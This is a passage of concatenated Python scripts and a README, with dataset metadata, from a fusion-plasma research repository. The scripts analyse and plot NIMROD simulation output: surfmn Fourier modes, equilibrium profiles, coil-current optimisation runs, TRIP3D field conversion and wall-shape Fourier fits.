plot_radial_rho(self,field,nn,mlist,**kwargs):\n ''' To do, I want to clean up the api'''\n if not(self.surfmn_data):\n self.read_surfmn()\n if nn<1:\n print(\"nn must be positive by convention in plot_radial\")\n raise ValueError\n ndex=self.ndict[nn]\n showplot=False\n# Create a new figure if an axis object is not included in kwargs\n if 'axis' in kwargs:\n ax = kwargs['axis']\n else:\n showplot=True\n if 'figsize' in kwargs:\n fig = plt.figure(figsize=kwargs['figsize'])\n else:\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n if (field=='b'):\n fmn=np.copy(self.bmnlist[ndex])\n title=f\"$b_m$ for n={int(nn)} at {self.time*1000:.3f}ms\"\n ylable=\"b\"\n elif (field=='psi'):\n fmn=np.copy(self.psimnlist[ndex])\n title=f\"$\\psi_m$ for n={int(nn)} at {self.time*1000:.3f}ms\"\n ylabel=f\"$\\psi$\"\n if \"scale\" in kwargs:\n fmn*=kwargs[\"scale\"]\n colorlist = list(mcolors.TABLEAU_COLORS)\n# Update plot based on keys in kwargs\n title=kwargs.get(\"title\",title)\n ylabel=kwargs.get(\"ylabel\",ylabel)#todo this should be rho\n xlabel=kwargs.get(\"xlabel\",r'$\\rho$')\n fontsize=kwargs.get(\"fontsize\",16)\n showplot=kwargs.get(\"plot\",showplot) #orverides showplot logic\n qlist=kwargs.get(\"qlist\",[])\n print(self.rho)\n print(self.mr)\n print(self.profs.q)\n for im,this_m in enumerate(mlist):\n this_i = self.get_m_index(this_m)\n if this_i!= None:\n mlbl = \"m = \" + str(this_m)\n tc=colorlist[im]\n ax.plot(self.profs.get_rho_q(self.q[20:]),fmn[20:,this_i], color=tc, label=mlbl)\n for iq,qq in enumerate(qlist):\n try:\n irho = self.profs.get_rho_q(qq)\n print(irho,qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(f\"q={qq:.2f} is not in the domain\")\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0)\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.xlim(0,1)\n plt.tight_layout()\n if showplot:\n plt.show()\n\n def get_resonance(self,field,nn,mm):\n ''' Evaluate the resonant component of a field at the given resonces'''\n if nn<1:\n print(\"nn must be positive by convention in get_resonance\")\n raise ValueError\n ndex=self.ndict[nn]\n mdex=self.get_m_index(mm)\n if ndex==None:\n print(f\"{nn} is not a n number in surfmn file\")\n raise ValueError\n if mdex==None:\n print(f\"{mm} is not an m number in surfmn file\")\n raise ValueError\n qres=mm/nn\n if qres<self.qmin or qres>self.qmax:\n print(qres,self.qmin,self.qmax)\n print(f\"The q value {qres} is not resonant\")\n raise ValueError\n if (field=='b'):\n resfield=interp.interp1d(self.rho,self.bmnlist[ndex][:,mdex])\n elif (field=='psi'):\n resfield=interp.interp1d(self.rho,self.psimnlist[ndex][:,mdex])\n else:\n print(f\"Field {field} is not reconized\")\n raise\n return resfield(self.psi_q(qres))\n def get_profiles(self):\n self.profdata=True\n self.profs=pf.Profiles(self.dumpfile,self.nimrodin)\n self.profs.calculate(rzo=[1.768,-0.018831,0.0])\n def dump(self,file):\n pickle.dump(self.surfmn_file,file)\n pickle.dump(self.dumpfile,file)\n pickle.dump(self.step,file)\n pickle.dump(self.time,file)\n pickle.dump(self.nimrodin,file)\n pickle.dump(self.mmax,file)\n pickle.dump(self.surfmn_data,file)\n pickle.dump(self.nlist,file)\n pickle.dump(self.ndict,file)\n pickle.dump(self.bmnlist,file)\n pickle.dump(self.psimnlist,file)\n pickle.dump(self.rho,file)\n pickle.dump(self.vprime,file)\n pickle.dump(self.q,file)\n pickle.dump(self.mr,file)\n pickle.dump(self.psi_q,file)\n pickle.dump(self.qmin,file)\n pickle.dump(self.qmax,file)\n 
pickle.dump(self.profdata,file)\n if(self.profdata==True):\n self.profs.dump(file)\n def load(self,file):\n self.surfmn_file=pickle.load(file)\n self.dumpfile=pickle.load(file)\n self.step=pickle.load(file)\n self.time=pickle.load(file)\n self.nimrodin=pickle.load(file)\n self.mmax=pickle.load(file)\n self.surfmn_data=pickle.load(file)\n self.nlist=pickle.load(file)\n self.ndict=pickle.load(file)\n self.bmnlist=pickle.load(file)\n self.psimnlist=pickle.load(file)\n self.rho=pickle.load(file)\n self.vprime=pickle.load(file)\n self.q=pickle.load(file)\n self.mr=pickle.load(file)\n self.psi_q=pickle.load(file)\n self.qmin=pickle.load(file)\n self.qmax=pickle.load(file)\n self.profdata=pickle.load(file)\n if(self.profdata==True):\n self.profs=pf.Profiles(self.dumpfile,self.nimrodin)\n self.profs.load(file)\n" }, { "alpha_fraction": 0.6304348111152649, "alphanum_fraction": 0.6887871623039246, "avg_line_length": 19.34883689880371, "blob_id": "de258f987a1e6a41d0ff66d2b8cbec66106869c7", "content_id": "e16afa9b3987ba07956d4c00882114aa7e169da5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 874, "license_type": "no_license", "max_line_length": 71, "num_lines": 43, "path": "/plotingScripts/eqInputPlts.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n\nhomeDir = os.environ['HOME']\n\nfname=home + \"/SCRATCH/NTM_TESTING/18102204_refine/eq_input_python.out\"\n\n\ndata = np.loadtxt(fname)\n\n\nrho = np.sqrt(data[:,1])\nprint rho\nq = data[:,4]\nq[0] = q[1]\nf = data[:,2]\np = data[:,3]\nprint q\n\n\n\nfig, ax1 = plt.subplots()\nax1.plot(rho, q, 'b-')\nax1.set_xlabel(r'$\\rho$',fontsize=16)\nax1.axes.set_xlim(left=0,right=1)\n\n# Make the y-axis label, ticks and tick labels match the line color.\nax1.set_ylabel('Safety Factor',rotation=90,fontsize=16)\nax1.axes.set_ylim(0,11)\n\nax2 = ax1.twinx()\nax2.plot(rho, p, 'r-')\nax2.set_ylabel('Pressure (Tm)',rotation=90,fontsize=16)\nax2.axes.set_ylim(0,0.14)\n\nax1.tick_params(axis='both', which='major', labelsize=14)\nax2.tick_params(axis='both', which='major', labelsize=14)\nplt.locator_params(axis='y', nbins=6)\nfig.tight_layout()\n\nplt.show()" }, { "alpha_fraction": 0.6327028870582581, "alphanum_fraction": 0.6931055784225464, "avg_line_length": 26.299999237060547, "blob_id": "cf4b7a549e1ec7352f1d857caa978d7057887c40", "content_id": "5220db1cccafe82684085a1010da55e1e615c4d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1639, "license_type": "no_license", "max_line_length": 100, "num_lines": 60, "path": "/biotSavart/coilRun.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# Input files:\n# Ouput file:\n\n\nimport os\nimport shutil\nimport biotSavartFunction as bsf\nimport scipy.optimize as opt\nimport numpy as np\n\ndirectory = os.getcwd()\ndir_list=[\"gs\",\"vac\"]\n\nhome_dir = os.environ['HOME']\n\nfgnimeq_cmd = home_dir + \"/SCRATCH/nimall/builds/nimdevel/ser/bin/fgnimeq-ser\"\nnimrod_cmd = home_dir + \"/SCRATCH/nimall/builds/nimdevel/ser/bin/nimrod-ser\"\nnimplot_cmd = home_dir + \"/SCRATCH/nimall/builds/nimdevel/ser/bin/nimplot < 
nimplot_inputs\"\n\ngs_files=[\"a174446.03390\",\"fluxgrid.in\",\"g174446.03390\",\"nimeq.in\",\"nimrod.in\",\n\"nimrod_bdry_rz.txt\",\"oculus.in\",\"p174446.3390.0_new_rot_fits\",\"p174446.3390.0_new_rot_fits.smooth\"]\nvac_files=[\"nimrod.in_vac\",\"nimplot_inputs\"]\nsrc_dir=\"nimrod_files\"\nfiles_dict={\"gs\":gs_files, \"vac\":vac_files}\n\nthis_coils=0\n\ndef run_nimrod():\n os.chdir(\"gs\")\n os.system(fgnimeq_cmd)\n os.chdir(\"..\")\n src_path=\"gs/dumpgll.00000.h5\"\n cp_path =\"vac/dumpgll.00000.h5\"\n shutil.copy(src_path, cp_path)\n os.chdir(\"vac\")\n os.system(nimrod_cmd)\n os.system(nimplot_cmd)\n os.chdir(\"..\")\n\ndef wrapper_fun(currents):\n this_coils.coil_calc(currents)\n run_nimrod()\n fileName=\"vac/surfmn.00100.h5\"\n cost=bsf.surfmn_eval(fileName)\n with open(\"runlog.txt\",'a+') as this_file:\n this_file.write(\"Status at step \\n\")\n this_file.write(\"Coil currents \\n\")\n this_file.write(str(currents))\n this_file.write(\"\\n Cost function \\n\")\n this_file.write(str(cost))\n this_file.write(\" \\n\")\n return cost\n\n### start main program\n\n### set up coils\ncurrents=[0.47528571, -0.57160186, 0.6809352, -0.13174283]\nthis_coils=bsf.coil_opt(\"./\")\nthis_coils.coil_calc(currents)\n\n" }, { "alpha_fraction": 0.5437511801719666, "alphanum_fraction": 0.5596777200698853, "avg_line_length": 42.75409698486328, "blob_id": "fee084098a7a5b37bc4d8e89d07be05a11d453a5", "content_id": "feba315f11d0465df964545cfc2276e97ad8be2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5337, "license_type": "no_license", "max_line_length": 108, "num_lines": 122, "path": "/trip2Nim/tripClass.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' Base class for storing and reading trip3D data '''\nimport numpy as np\nclass TripClass:\n probeRzFile = \"\"\n probeBFile = \"\"\n probeAFile = \"\"\n bData = np.zeros(1)\n aData = np.zeros(1)\n npoints = 0\n nphi = 0\n rr = np.zeros(1)\n zz = np.zeros(1)\n phi = np.zeros(1)\n brReal = np.zeros(1)\n bzReal = np.zeros(1)\n btReal = np.zeros(1)\n brPhase = np.zeros(1,dtype=np.complex_)\n bzPhase = np.zeros(1,dtype=np.complex_)\n shiftindex=0\n complexConj=False\n def __init__ (self,rzFile, aFile, bFile, shiftindex, complexConj):\n ''' Initialize TripClass '''\n self.probeRzFile = rzFile\n self.probeBFile = bFile\n self.probeAFile = aFile\n self.shiftindex = shiftindex\n self.complexConj = complexConj\n def readRz (self):\n ''' Read probeRz File as Save data '''\n #todo\n def readBFile (self):\n ''' Read probeBFile as Save Data '''\n #b data is stores phi, r, z, B_phi, B_R, B_Z, B_p, B_mag, PsiN_pol\n self.bData = np.loadtxt(self.probeBFile,comments='%')\n def reorderBFile(self):\n ''' Reorder the bfile to account for a shift in the data '''\n if (self.shiftindex==0):\n return\n else:\n # reorder data becuase jake changed the indexing in NIMROD\n tempData = self.bData\n for ip in range(self.nphi):\n startIndex= ip * self.npoints\n for ii in range(self.npoints):\n if(ii>=self.shiftindex):\n self.bData[ii-self.shiftindex+startIndex,:]=tempData[ii+startIndex,:]\n else:\n self.bData[self.npoints-self.shiftindex+ii+startIndex,:]=tempData[ii+1+startIndex,:]\n# self.bData = np.zeros(tempData.shape)\n# maxData=self.bData.shape[0]\n# for ii in range(maxData): \n def readAFile (self):\n ''' Read probeAFile as Save Data '''\n #b data is stores phi, r, z, A_phi, A_R, A_Z, A_p, A_mag, PsiN_pol\n self.aData = 
np.loadtxt(self.probeAFile,comments='%')\n def findNumPoints (self, data):\n phi0 = data[0,0]\n for ii in range(data.shape[0]):\n if (data[ii,0]!=phi0):\n self.npoints =ii \n break\n self.nphi = int(data.shape[0]/self.npoints)\n def flipPhi (self):\n for ii, iphi in enumerate(self.phi):\n print (ii, iphi)\n self.phi[ii] = 360.0 - iphi\n if (self.phi[ii]==360.0): self.phi[ii]=0.0\n def processBFile (self):\n self.readBFile()\n self.findNumPoints(self.bData)\n self.reorderBFile()\n self.phi = np.zeros(self.nphi)\n self.brReal = np.zeros([self.npoints,self.nphi])\n self.bzReal = np.zeros([self.npoints,self.nphi])\n self.btReal = np.zeros([self.npoints,self.nphi])\n self.rr = self.bData[:self.npoints,1]\n self.zz = self.bData[:self.npoints,2]\n for ii in range(self.nphi):\n startIndex = ii * self.npoints\n self.phi[ii] = self.bData[startIndex,0]\n self.brReal[:,ii] = self.bData[startIndex:startIndex+self.npoints,4]\n self.bzReal[:,ii] = self.bData[startIndex:startIndex+self.npoints,5]\n self.btReal[:,ii] = self.bData[startIndex:startIndex+self.npoints,3]\n # i don't know if I need to flip phi or change the sign of Bphi\n #self.flipPhi()\n # to be consistant with nimrod I should use the forward fft when going\n # from real space to fourier space, and I also need to devide by nphi\n # numpy does not have an option for normalizing the FFT by n,\n # it can only do sqrt(N) normalization or normalize the IFFT by N.\n if self.complexConj:\n self.brPhase = np.fft.ifft(self.brReal,axis=1)\n self.bzPhase = np.fft.ifft(self.bzReal,axis=1)\n self.btPhase = np.fft.ifft(self.btReal,axis=1)\n else:\n self.brPhase = np.fft.fft(self.brReal,axis=1)/(float(self.nphi))\n self.bzPhase = np.fft.fft(self.bzReal,axis=1)/(float(self.nphi))\n self.btPhase = np.fft.fft(self.btReal,axis=1)/(float(self.nphi))\n \n def writeNimrodBext(self,path,baseFileName,fileExt):\n if (self.nphi % 2 == 0): #even\n maxnphi = int(self.nphi/2)\n else: #odd\n maxnphi = int((self.nphi+1)/2)\n for ii in range (maxnphi +1):\n \n if ii==maxnphi:\n fac=0.5\n else:\n fac=1.0\n print(ii, maxnphi, fac)\n tempFileName = path + baseFileName +\"{0:0=2d}\".format(ii) + fileExt\n thisFile = open(tempFileName,'w')\n for jj in range(self.brPhase.shape[0]):\n thisLine = '{: 16.16e}'.format(fac*self.brPhase[jj,ii].real) + \", \" \n thisLine+= '{: 16.16e}'.format(fac*self.brPhase[jj,ii].imag) + \", \"\n thisLine+= '{: 16.16e}'.format(fac*self.bzPhase[jj,ii].real) + \", \" \n thisLine+= '{: 16.16e}'.format(fac*self.bzPhase[jj,ii].imag) + \", \"\n thisLine+= '{: 16.16e}'.format(fac*self.btPhase[jj,ii].real) + \", \" \n thisLine+= '{: 16.16e}'.format(fac*self.btPhase[jj,ii].imag) + \"\\n\"\n thisFile.write(thisLine)\n thisFile.close()" }, { "alpha_fraction": 0.5786939859390259, "alphanum_fraction": 0.6025533676147461, "avg_line_length": 37.231998443603516, "blob_id": "1cf057c2fe76bd0549119ac5295e68bd97146c3c", "content_id": "5d935fc2f7cf9911fdfa9b9fbc617bbd41caa8b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4778, "license_type": "no_license", "max_line_length": 95, "num_lines": 125, "path": "/trip2Nim/nim_wall.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport numpy as np\nimport scipy.fftpack as fft\nimport matplotlib.pyplot as plt\nimport scipy.optimize as opt\nclass NimrodWall:\n ''' Base class for dealing with NIMROD wall files '''\n wall_file = ''\n wall_modes = -1 # Number of Fouier modes in wall\n plt_wall = False\n check_ft = 
False # check my Fourier transform\n wall_points = 500 # points to use in high res wall\n file_rz = np.zeros([1,2])\n rm_wall = np.zeros(1)\n zm_wall = np.zeros(1)\n rz_wall = np.zeros([1,2])\n rz2_wall = np.zeros([1,2])\n def __init__(self, file, modes, plot_wall=False, check_ft=False,*args, **kwargs):\n ''' Initalize NimrodWall class '''\n self.wall_file=file\n self.wall_modes=modes\n self.plt_wall=plot_wall\n self.check_ft=check_ft\n self.read_file()\n self.get_fourier()\n self.get_wall_rz()\n if self.check_ft:\n self.rz2_wall =np.zeros([self.wall_points,2])\n for itheta, theta in enumerate(np.linspace(0,2*np.pi,num=self.wall_points)):\n self.rz2_wall[itheta,0],self.rz2_wall[itheta,1] = self.get_rz_theta(theta)\n if self.plt_wall:\n self.plot_rz()\n def read_file(self):\n ''' Read a nimrod wall file '''\n self.file_rz = np.loadtxt(self.wall_file, delimiter=',', skiprows=1)\n def get_fourier(self):\n ''' Calculate the Fourier coffiecents of R and Z \n\n The fourier modes are stored as followes:\n index 0 : m=0\n index 1 : real m=1\n index 2 : imag m=1\n index 2l-1 : real m = l\n index 2l : imag m = l\n '''\n rm = fft.rfft(self.file_rz[:,0])/self.file_rz.shape[0]\n zm = fft.rfft(self.file_rz[:,1])/self.file_rz.shape[0]\n if self.wall_modes < 0: # use all the Fourier modes\n self.rm_wall = rm\n self.zm_wall = zm\n else: # Truncate Fourier spectrum \n max_index = min(2*self.wall_modes+1,rm.size)\n self.rm_wall = rm[:max_index]\n self.zm_wall = zm[:max_index]\n def get_wall_rz(self):\n ''' Calculate a high resolution wall from the fourier RZ '''\n r_wall = fft.irfft(self.rm_wall,self.wall_points)*self.wall_points\n z_wall = fft.irfft(self.zm_wall,self.wall_points)*self.wall_points\n self.rz_wall = np.stack((r_wall,z_wall),axis=-1) \n def get_rz_theta(self, theta):\n ''' Return a given RZ location on the wall as a function of theta \n\n Here theta is an angle in radians\n '''\n rt = self.rm_wall[0]\n zt = self.zm_wall[0]\n m = self.rm_wall.size\n if self.rm_wall.size % 2: #odd\n m_max = int((self.rm_wall.size-1)/2)\n m_modes = range(1,m_max+1)\n else: # even\n m_max = int(self.rm_wall.size)/2+1\n m_modes = range(1,m_max)\n rt += self.rm_wall[-1]*np.cos(theta * m_max)\n zt += self.zm_wall[-1]*np.cos(theta * m_max)\n for im, m in enumerate(m_modes,1):\n rt += 2.0*(self.rm_wall[2*im-1]*np.cos(theta*m)-self.rm_wall[2*im]*np.sin(theta*m))\n zt += 2.0*(self.zm_wall[2*im-1]*np.cos(theta*m)-self.zm_wall[2*im]*np.sin(theta*m))\n return rt, zt\n def get_drz_dtheta(self, theta):\n ''' Return a the theta derivative of RZ along the wall at theta \n\n Here theta is an angle in radians\n '''\n rt = 0\n zt = 0\n m = self.rm_wall.size\n if self.rm_wall.size % 2: #odd\n m_max = int((self.rm_wall.size-1)/2)\n m_modes = range(1,m_max+1)\n else: # even\n m_max = int(self.rm_wall.size)/2+1\n m_modes = range(1,m_max)\n rt += self.rm_wall[-1]*np.sin(theta * m_max)*m_max\n zt += self.zm_wall[-1]*np.sin(theta * m_max)*m_max\n for im, m in enumerate(m_modes,1):\n rt += 2.0*m*(self.rm_wall[2*im-1] * np.sin(theta*m) + self.rm_wall[2*im]*np.cos(theta*m))\n zt += 2.0*m*(self.zm_wall[2*im-1] * np.sin(theta*m) + self.zm_wall[2*im]*np.cos(theta*m))\n return rt, zt\n def get_theta_rz(self,r,z):\n ''' Return the theta value at r,z on the surface '''\n #opts = {\"maxiter\" : 10000}\n opts = {}\n dist = (self.rz_wall[:,0]-r)**2 + (self.rz_wall[:,1]-z)**2\n guess = np.argmin(dist)/self.rz_wall.shape[0] * 2*np.pi\n opt_theta = opt.minimize(self.dist,guess,(r,z),method='CG',tol=1e-5,options=opts)\n if not opt_theta.success:\n 
print(\"get_theta_rz optimze failed with message: \" + opt_theta.message)\n return opt_theta.x[0],self.dist(opt_theta.x[0],r,z)\n\n def dist(self,theta, *args):\n ''' Return the distance between a point on the surface and r,z '''\n ro = args[0]\n zo = args[1]\n r,z = self.get_rz_theta(theta)\n dist = np.sqrt((ro-r)**2 + (zo-z)**2)\n return dist\n def plot_rz(self):\n plt.plot(self.file_rz[:,0],self.file_rz[:,1], 'bo', label=\"Orginal Wall\")\n plt.plot(self.rz_wall[:,0],self.rz_wall[:,1], 'g-', label=\"Smooth Wall\")\n if self.check_ft:\n plt.plot(self.rz2_wall[:,0],self.rz_wall[:,1], 'k-', label=\"2nd Wall\")\n plt.legend(loc=1)\n plt.show()" }, { "alpha_fraction": 0.7716390490531921, "alphanum_fraction": 0.7716390490531921, "avg_line_length": 40.69230651855469, "blob_id": "141fb5d96e9d90893f74a4975e4b135978f175c0", "content_id": "a22cd1ce75cdf0bb4bad385304720d772cfdbcdf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 543, "license_type": "no_license", "max_line_length": 154, "num_lines": 13, "path": "/nimflSeed/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "# nimflSeed\nThese scripts generate a random collection of start locations for NIMFL field line tracing, and write the start locations to the file start_positions.dat.\n\n## startPosClass \nContains the python script to generate random numbers. Also contains all the \nfunctions for different geometries\n\n### Todo\n - [x] Write driver script\n - [x] Write script to seed field lines for RMP calculations\n - [x] Use ingon function to more efficiently chose seed locations\n - [ ] Write a generic DIII-D seeding function\n - [x] Write function to write \n" }, { "alpha_fraction": 0.5249339938163757, "alphanum_fraction": 0.5535720586776733, "avg_line_length": 39.13351821899414, "blob_id": "68f652053476ad198cca8b9f24e1f7d66a01f624", "content_id": "7033643ae55bfa8c6f49af539850d5e1d1b861a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 58314, "license_type": "no_license", "max_line_length": 124, "num_lines": 1453, "path": "/ntmscripts/ntm_step_real.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#profiles is a class for calculating 1D profiles\n# using the flux surface integration\n#\n#\nimport f90nml\nimport eval_nimrod as eval\n#import field_class as fc\nimport plot_nimrod as pn\nimport fsa\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nfrom scipy.interpolate import interp1d,splev,UnivariateSpline,griddata\nfrom scipy.fft import fft, ifft\nimport os\nimport h5py\nimport sys\nimport numpy as np\nimport pickle\nimport ntm_fields\nimport time\nimport nim_timer as timer\n\nclass ntmstep:\n def __init__(self,dumpfile,nimrodin):\n #start with dump file and nimrod.in info\n self.dumpfile=dumpfile\n self.nimrodin=nimrodin\n self.fields=ntm_fields.ntmfields(dumpfile,nimrodin)\n self.time=None\n self.step=None\n self.eval=None\n self.grid=None\n self.mode=None #grid, fsa\n #field data\n self.fielddict={}\n # next include info on how fsa's were performed\n self.mmax=None\n self.ifour=[]\n self.nfour=None\n\n self.fsa=False\n self.dvar_dict={}\n self.fsa_dict={}\n self.interp_dict={}\n self.setprofiles=False\n self.raw_bcmn=np.empty([1])\n self.raw_bsmn=np.empty([1])\n self.raw_bmn_amp=np.empty([1])\n self.raw_bmn_phase=np.empty([1])\n\n #finally end with the profiles\n self.psin=np.empty([1])\n 
self.psi=np.empty([1])\n self.rhon=np.empty([1])\n self.q=np.empty([1])\n self.qpsi=np.empty([1])\n self.vprime=np.empty([1])\n self.bmn=np.empty([1])\n self.bcmn=np.empty([1])\n self.bsmn=np.empty([1])\n\n\n def dump(self,file):\n pickle.dump(self.dumpfile,file)\n pickle.dump(self.nimrodin,file)\n pickle.dump(self.time,file)\n pickle.dump(self.step,file)\n # next include info on how fsa's were performed\n pickle.dump(self.mmax,file)\n pickle.dump(self.ifour,file)\n pickle.dump(self.nfour,file)\n pickle.dump(self.fsa,file)\n pickle.dump(self.dvar_dict,file)\n pickle.dump(self.fsa_dict,file)\n pickle.dump(self.raw_bcmn,file)\n pickle.dump(self.raw_bsmn,file)\n pickle.dump(self.raw_bmn_amp,file)\n pickle.dump(self.raw_bmn_phase,file)\n\n\n def load(self,file):\n print(file)\n with open(file,'rb') as pickle_file:\n self.dumpfile=pickle.load(pickle_file)\n self.nimrodin=pickle.load(pickle_file)\n self.time=pickle.load(pickle_file)\n self.step=pickle.load(pickle_file)\n # next include info on how fsa's were performed\n self.mmax=pickle.load(pickle_file)\n self.ifour=pickle.load(pickle_file)\n self.nfour=pickle.load(pickle_file)\n self.fsa=pickle.load(pickle_file)\n self.dvar_dict=pickle.load(pickle_file)\n self.fsa_dict=pickle.load(pickle_file)\n self.raw_bcmn=pickle.load(pickle_file)\n self.raw_bsmn=pickle.load(pickle_file)\n self.raw_bmn_amp=pickle.load(pickle_file)\n self.raw_bmn_phase=pickle.load(pickle_file)\n\n if self.fsa == True:\n self.interpolate_fsa()\n\n def interpolate_fsa(self):\n\n rhomin=np.min(self.dvar_dict['rhon'])\n rhomax=np.max(self.dvar_dict['rhon'])\n print(self.dvar_dict['rhon'].shape,self.raw_bcmn.shape)\n self.rhon = np.linspace(rhomin,rhomax,300,endpoint=True)\n self.psin=interp1d(self.dvar_dict['rhon'],self.dvar_dict['psin'],kind='cubic')(self.rhon)\n self.psi =interp1d(self.dvar_dict['rhon'],self.dvar_dict['psi'] ,kind='cubic')(self.rhon)\n self.vprime=np.pi*2*interp1d(self.dvar_dict['rhon'],self.dvar_dict['vprime'],kind='cubic')(self.rhon)\n self.q=interp1d(self.dvar_dict['rhon'],self.dvar_dict['q'], kind='cubic')(self.rhon)\n self.bcmn=interp1d(self.dvar_dict['rhon'],self.raw_bcmn, kind='cubic')(self.rhon)\n self.bsmn=interp1d(self.dvar_dict['rhon'],self.raw_bsmn, kind='cubic')(self.rhon)\n self.bmn_amp =interp1d(self.dvar_dict['rhon'],self.raw_bmn_amp , kind='cubic')(self.rhon)\n self.bmn_phase =interp1d(self.dvar_dict['rhon'],self.raw_bmn_phase , kind='linear')(self.rhon)\n\n for ikey in self.fsa_dict:\n this_cmn,this_smn = self.fsa_dict[ikey]\n thismn_amp=np.sqrt(np.square(this_cmn)+np.square(this_smn))\n thismn_phase=np.arctan2(this_smn,this_cmn)\n\n cosmn=interp1d(self.dvar_dict['rhon'],this_cmn , kind='cubic')(self.rhon)\n sinmn=interp1d(self.dvar_dict['rhon'],this_smn , kind='cubic')(self.rhon)\n amp =interp1d(self.dvar_dict['rhon'],thismn_amp , kind='cubic')(self.rhon)\n phase =interp1d(self.dvar_dict['rhon'],thismn_phase , kind='linear')(self.rhon)\n print(ikey)\n self.interp_dict[ikey]=(cosmn,sinmn,amp,phase)\n\n\n def interpolate_psi(self):\n rhomin=np.min(self.dvar_dict['rhon'])\n rhomax=np.max(self.dvar_dict['rhon'])\n print(self.dvar_dict['rhon'].shape,self.raw_bcmn.shape)\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n self.psin=interp1d(self.dvar_dict['rhon'],self.dvar_dict['psin'],kind='cubic')(self.rhon)\n self.psi =interp1d(self.dvar_dict['rhon'],self.dvar_dict['psi'] ,kind='cubic')(self.rhon)\n self.vprime=np.pi*2*interp1d(self.dvar_dict['rhon'],self.dvar_dict['vprime'],kind='cubic')(self.rhon)\n 
self.q=interp1d(self.dvar_dict['rhon'],self.dvar_dict['q'], kind='cubic')(self.rhon)\n self.bcmn=interp1d(self.dvar_dict['rhon'],self.raw_bcmn, kind='cubic')(self.rhon)\n self.bsmn=interp1d(self.dvar_dict['rhon'],self.raw_bsmn, kind='cubic')(self.rhon)\n self.bmn_amp =interp1d(self.dvar_dict['rhon'],self.raw_bmn_amp , kind='cubic')(self.rhon)\n self.bmn_phase =interp1d(self.dvar_dict['rhon'],self.raw_bmn_phase , kind='linear')(self.rhon)\n\n\n def set_3dgrid(self,rmin,rmax,zmin,zmax,nr,nz,lphi,nonlin_order=2,debug=0):\n '''sets up a 3d grid, using non to determine the number of phi planes\n based on\n '''\n self.nmodes=self.calc_nmodes(lphi)\n self.nmax=self.nmodes-1\n nphi=nonlin_order*self.nmodes\n phimax=np.pi*2*(nphi-1)/nphi\n p1 = np.array([rmin, zmin, 0.0])\n p2 = np.array([rmax, zmin, 0.0])\n p3 = np.array([rmin, zmax, 0.0])\n p4 = np.array([rmin, zmin, phimax])\n rzp3d = pn.PlotNimrod.grid_3d_gen(p1, p2, p3, p4, nr, nz,nphi)\n self.fields.grid=eval.EvalGrid(rzp3d)\n self.fields.grid.set_debug(debug)\n self.fields.grid.set_3d_symm()\n\n def set_2dgrid(self,start,stop,npts,lphi,nonlin_order=2,debug=0):\n '''sets up a 3d grid, using non to determine the number of phi planes\n based on\n '''\n self.nmodes=self.calc_nmodes(lphi)\n self.nmax=self.nmodes-1\n nphi=nonlin_order*self.nmodes\n phimax=np.pi*2*(nphi-1)/nphi\n p1 = np.array([start[0], start[1], 0.0])\n p2 = np.array([stop[0], stop[1], 0.0])\n p3 = np.array([start[0], start[1], phimax])\n rzp2d = pn.PlotNimrod.grid_2d_gen(p1, p2, p3, npts,nphi)\n self.fields.grid=eval.EvalGrid(rzp2d)\n self.fields.grid.set_debug(debug)\n\n def set_fsagrid(self,r,z,lphi,nonlin_order):\n self.nmodes=self.calc_nmodes(lphi)\n self.nmax=self.nmodes-1\n nphi=nonlin_order*self.nmodes\n phimax=np.pi*2*(nphi-1)/nphi\n rzp=np.zeros([3,nphi])\n rzp[0,:]=r\n rzp[1,:]=z\n rzp[2,:]=np.linspace(0,phimax,nphi)\n return rzp\n\n def analyze(self):\n rmin=0.8\n rmax=2.5\n zmin=-1.5\n zmax=1.5\n npts=300\n lphi=5\n nonlin_order=2\n\n self.set_3dgrid(rmin,rmax,zmin,zmax,npts,npts,lphi,nonlin_order)\n #self.set_fsagrid(1,1,lphi,nonlin_order)\n self.fields.induction()\n divpie_fft=self.fields.fft(self.fields.edict['divpie'])\n figsize=[6,6]\n fig, ax = plt.subplots(figsize=figsize)\n ax.set_aspect('equal')\n ax.set(title=r\"$|E_\\pi|_R$\")\n pn.PlotNimrod.plot_scalar_plane(self.fields.grid.rzp[:,:,:,0], np.abs(divpie_fft[0,:,:,1]),ax=ax)\n\n\n fig, ax = plt.subplots(figsize=figsize)\n ax.set_aspect('equal')\n ax.set(title=r\"$|E_\\pi|_Z$\")\n pn.PlotNimrod.plot_scalar_plane(self.fields.grid.rzp[:,:,:,0], np.abs(divpie_fft[1,:,:,1]),ax=ax)\n # self.continuity()\n # self.momentum()\n # self.temperature()\n # self.induction()\n\n def find_comp_boundary(self,inpoint,outpoint,tol=1e-8):\n index=0\n maxit=100\n ntest=self.fields.eval.eval_field('n',outpoint,dmode=0,eq=1)\n if ntest ==ntest:\n '''return if outpoint is in domain'''\n return outpoint\n fst=np.copy(inpoint)\n lst=np.copy(outpoint)\n print(fst,inpoint)\n print(lst,outpoint)\n dist=np.linalg.norm(lst-fst,2)\n if dist<tol:\n return fst\n while True:\n tst=(fst+lst)/2.0\n print(tst)\n 